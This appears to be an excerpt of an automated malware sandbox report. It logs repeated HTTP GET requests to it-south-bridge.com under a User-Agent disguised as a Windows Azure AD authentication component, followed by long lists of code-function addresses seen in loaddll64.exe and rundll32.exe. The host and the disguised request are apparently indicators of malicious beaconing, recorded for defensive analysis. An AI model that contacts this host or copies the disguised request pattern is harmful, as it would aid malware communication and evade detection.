Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip
Source: global traffic	HTTP traffic detected: GET /XbnZ/XmznAcQ/f1c6af4d-2957-f0a9-941e-8fbbf2c3576a/TrxZ HTTP/1.1Host: it-south-bridge.comUser-Agent: Windows-AzureAD-Authentication-Provider/2.0Accept: /accept-encoding: gzip

Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30FE9AA	1_2_000007FEF30FE9AA
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF304F85D	1_2_000007FEF304F85D
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30B4FBA	1_2_000007FEF30B4FBA
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF304DFF4	1_2_000007FEF304DFF4
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30B6ED4	1_2_000007FEF30B6ED4
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF304BF20	1_2_000007FEF304BF20
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30B7E38	1_2_000007FEF30B7E38
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF304EC54	1_2_000007FEF304EC54
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF304329C	1_2_000007FEF304329C
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30452B3	1_2_000007FEF30452B3
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF304F0D5	1_2_000007FEF304F0D5
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30B111D	1_2_000007FEF30B111D
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF304E75F	1_2_000007FEF304E75F
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30BB7C0	1_2_000007FEF30BB7C0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30B96A4	1_2_000007FEF30B96A4
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30C0B4F	1_2_000007FEF30C0B4F
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3057B70	1_2_000007FEF3057B70
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E7B70	1_2_000007FEF30E7B70
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF309ABD0	1_2_000007FEF309ABD0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3074BEC	1_2_000007FEF3074BEC
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305FBFD	1_2_000007FEF305FBFD
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305FA3F	1_2_000007FEF305FA3F
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305FA4D	1_2_000007FEF305FA4D
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305FA98	1_2_000007FEF305FA98
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E6A90	1_2_000007FEF30E6A90
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30EBAF0	1_2_000007FEF30EBAF0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30C3B13	1_2_000007FEF30C3B13
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF309D940	1_2_000007FEF309D940
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305F97B	1_2_000007FEF305F97B
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30649C6	1_2_000007FEF30649C6
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3058850	1_2_000007FEF3058850
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30C189F	1_2_000007FEF30C189F
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30EC8C0	1_2_000007FEF30EC8C0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30C98D0	1_2_000007FEF30C98D0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305F8EA	1_2_000007FEF305F8EA
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30708F0	1_2_000007FEF30708F0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E6F50	1_2_000007FEF30E6F50
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305FF8F	1_2_000007FEF305FF8F
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305FFC7	1_2_000007FEF305FFC7
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3064FDE	1_2_000007FEF3064FDE
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30A2000	1_2_000007FEF30A2000
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30EB020	1_2_000007FEF30EB020
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30DBE40	1_2_000007FEF30DBE40
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF306AE60	1_2_000007FEF306AE60
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30EDEF0	1_2_000007FEF30EDEF0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30C9F00	1_2_000007FEF30C9F00
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30C7F20	1_2_000007FEF30C7F20
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E8D40	1_2_000007FEF30E8D40
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3053D50	1_2_000007FEF3053D50
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E6D50	1_2_000007FEF30E6D50
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30EED60	1_2_000007FEF30EED60
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3058D70	1_2_000007FEF3058D70
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3074D74	1_2_000007FEF3074D74
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30BCDB5	1_2_000007FEF30BCDB5
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305FDC1	1_2_000007FEF305FDC1
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30C7DC0	1_2_000007FEF30C7DC0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF309CDD0	1_2_000007FEF309CDD0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305FE13	1_2_000007FEF305FE13
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E7E10	1_2_000007FEF30E7E10
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3069E30	1_2_000007FEF3069E30
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E6C50	1_2_000007FEF30E6C50
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3056877	1_2_000007FEF3056877
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E7CD0	1_2_000007FEF30E7CD0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF306CCE0	1_2_000007FEF306CCE0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305FCE7	1_2_000007FEF305FCE7
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF304ACF5	1_2_000007FEF304ACF5
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305BD30	1_2_000007FEF305BD30
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30603C7	1_2_000007FEF30603C7
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E7400	1_2_000007FEF30E7400
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30EA420	1_2_000007FEF30EA420
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF306524D	1_2_000007FEF306524D
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30EC270	1_2_000007FEF30EC270
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3058280	1_2_000007FEF3058280
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E42A0	1_2_000007FEF30E42A0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30452A6	1_2_000007FEF30452A6
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305F2D4	1_2_000007FEF305F2D4
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30BF31F	1_2_000007FEF30BF31F
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF306514D	1_2_000007FEF306514D
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF304415C	1_2_000007FEF304415C
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30601AF	1_2_000007FEF30601AF
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30EB1D0	1_2_000007FEF30EB1D0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30C01EC	1_2_000007FEF30C01EC
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30601F2	1_2_000007FEF30601F2
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3041208	1_2_000007FEF3041208
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30BE068	1_2_000007FEF30BE068
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E8090	1_2_000007FEF30E8090
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30B209F	1_2_000007FEF30B209F
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305B0D6	1_2_000007FEF305B0D6
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305A103	1_2_000007FEF305A103
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E7100	1_2_000007FEF30E7100
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3100100	1_2_000007FEF3100100
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3065765	1_2_000007FEF3065765
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305F78C	1_2_000007FEF305F78C
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305A7AA	1_2_000007FEF305A7AA
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30A17B0	1_2_000007FEF30A17B0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30B67DC	1_2_000007FEF30B67DC
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305F7FA	1_2_000007FEF305F7FA
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E7810	1_2_000007FEF30E7810
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30AA820	1_2_000007FEF30AA820
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30526F7	1_2_000007FEF30526F7
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3059712	1_2_000007FEF3059712
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305F73A	1_2_000007FEF305F73A
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30AA570	1_2_000007FEF30AA570
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30EB600	1_2_000007FEF30EB600
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E9600	1_2_000007FEF30E9600
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30A8460	1_2_000007FEF30A8460
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF305F484	1_2_000007FEF305F484
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF3064487	1_2_000007FEF3064487
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30E84E0	1_2_000007FEF30E84E0
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF30C44DE	1_2_000007FEF30C44DE
Source: C:\Windows\System32\loaddll64.exe	Code function: 1_2_000007FEF310051D	1_2_000007FEF310051D
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F3CBB9	9_2_000007FEF2F3CBB9
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F43F08	9_2_000007FEF2F43F08
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F4023E	9_2_000007FEF2F4023E
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EDD684	9_2_000007FEF2EDD684
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F42644	9_2_000007FEF2F42644
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2ED959D	9_2_000007FEF2ED959D
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F6DB20	9_2_000007FEF2F6DB20
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F75AF0	9_2_000007FEF2F75AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F74A50	9_2_000007FEF2F74A50
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F2CC00	9_2_000007FEF2F2CC00
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EEDB90	9_2_000007FEF2EEDB90
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F71910	9_2_000007FEF2F71910
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F748A0	9_2_000007FEF2F748A0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EE8850	9_2_000007FEF2EE8850
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EFFA20	9_2_000007FEF2EFFA20
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F52A00	9_2_000007FEF2F52A00
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2ED99B0	9_2_000007FEF2ED99B0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F70980	9_2_000007FEF2F70980
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F88EF7	9_2_000007FEF2F88EF7
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2ED2EE6	9_2_000007FEF2ED2EE6
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F2BEE0	9_2_000007FEF2F2BEE0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F74E80	9_2_000007FEF2F74E80
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F72E80	9_2_000007FEF2F72E80
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EE3E70	9_2_000007FEF2EE3E70
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EFBE50	9_2_000007FEF2EFBE50
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EFA025	9_2_000007FEF2EFA025
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F3C017	9_2_000007FEF2F3C017
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F28FE0	9_2_000007FEF2F28FE0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F4FCE9	9_2_000007FEF2F4FCE9
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EE9CAB	9_2_000007FEF2EE9CAB
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F73CA0	9_2_000007FEF2F73CA0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F70C80	9_2_000007FEF2F70C80
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EE2C67	9_2_000007FEF2EE2C67
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F36DAB	9_2_000007FEF2F36DAB
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F71D60	9_2_000007FEF2F71D60
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EE8D40	9_2_000007FEF2EE8D40
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EE9320	9_2_000007FEF2EE9320
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F70310	9_2_000007FEF2F70310
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EE42A0	9_2_000007FEF2EE42A0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EF42A8	9_2_000007FEF2EF42A8
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2ED5267	9_2_000007FEF2ED5267
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F26260	9_2_000007FEF2F26260
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F713F0	9_2_000007FEF2F713F0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F75370	9_2_000007FEF2F75370
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F14360	9_2_000007FEF2F14360
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2ED10E5	9_2_000007FEF2ED10E5
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F71090	9_2_000007FEF2F71090
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F0420F	9_2_000007FEF2F0420F
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EF51F5	9_2_000007FEF2EF51F5
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EEA1BE	9_2_000007FEF2EEA1BE
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EEB1A4	9_2_000007FEF2EEB1A4
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2ED4164	9_2_000007FEF2ED4164
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EE8140	9_2_000007FEF2EE8140
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F76140	9_2_000007FEF2F76140
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EF46CE	9_2_000007FEF2EF46CE
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F656C0	9_2_000007FEF2F656C0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F51640	9_2_000007FEF2F51640
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F4E83C	9_2_000007FEF2F4E83C
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F707D0	9_2_000007FEF2F707D0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F77770	9_2_000007FEF2F77770
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F54510	9_2_000007FEF2F54510
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EEE4F1	9_2_000007FEF2EEE4F1
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F704D0	9_2_000007FEF2F704D0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F28470	9_2_000007FEF2F28470
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F2D450	9_2_000007FEF2F2D450
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F785E0	9_2_000007FEF2F785E0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EF45CE	9_2_000007FEF2EF45CE
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F705D0	9_2_000007FEF2F705D0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F725C0	9_2_000007FEF2F725C0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EE15B0	9_2_000007FEF2EE15B0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2EF75AB	9_2_000007FEF2EF75AB
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000007FEF2F71550	9_2_000007FEF2F71550
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018001C05A	9_2_000000018001C05A
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180018CC7	9_2_0000000180018CC7
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180011E04	9_2_0000000180011E04
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018009FF80	9_2_000000018009FF80
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800AF040	9_2_00000001800AF040
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180006070	9_2_0000000180006070
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800980EA	9_2_00000001800980EA
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018002F154	9_2_000000018002F154
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800CA160	9_2_00000001800CA160
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800171DE	9_2_00000001800171DE
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018001820E	9_2_000000018001820E
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180079270	9_2_0000000180079270
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180041279	9_2_0000000180041279
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800A72A8	9_2_00000001800A72A8
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800CD2C0	9_2_00000001800CD2C0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180031342	9_2_0000000180031342
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180028380	9_2_0000000180028380
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018002E396	9_2_000000018002E396
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018004B3B3	9_2_000000018004B3B3
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018009C3B2	9_2_000000018009C3B2
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800073CD	9_2_00000001800073CD
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800AB408	9_2_00000001800AB408
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018002D51E	9_2_000000018002D51E
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018002054B	9_2_000000018002054B
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800A55A0	9_2_00000001800A55A0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800E4598	9_2_00000001800E4598
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800A664C	9_2_00000001800A664C
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800CD6D0	9_2_00000001800CD6D0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018009E6C3	9_2_000000018009E6C3
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180008744	9_2_0000000180008744
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018007C780	9_2_000000018007C780
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018007C790	9_2_000000018007C790
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018001F7BF	9_2_000000018001F7BF
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018007A7E0	9_2_000000018007A7E0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180028870	9_2_0000000180028870
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018008F932	9_2_000000018008F932
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800CC950	9_2_00000001800CC950
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018001E980	9_2_000000018001E980
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800E69C7	9_2_00000001800E69C7
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800CDA30	9_2_00000001800CDA30
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018006EA46	9_2_000000018006EA46
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180002A4D	9_2_0000000180002A4D
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018005BADC	9_2_000000018005BADC
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800CCB10	9_2_00000001800CCB10
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800B0B50	9_2_00000001800B0B50
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018002DB68	9_2_000000018002DB68
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800CDB90	9_2_00000001800CDB90
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180070BE0	9_2_0000000180070BE0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800CCC10	9_2_00000001800CCC10
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180027C70	9_2_0000000180027C70
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800ADC80	9_2_00000001800ADC80
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018002DCA4	9_2_000000018002DCA4
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_000000018002DCC9	9_2_000000018002DCC9
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180022CE0	9_2_0000000180022CE0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_0000000180092CF0	9_2_0000000180092CF0
Source: C:\Windows\System32\rundll32.exe	Code function: 9_2_00000001800C1D00	9_2_00000001800C1D00
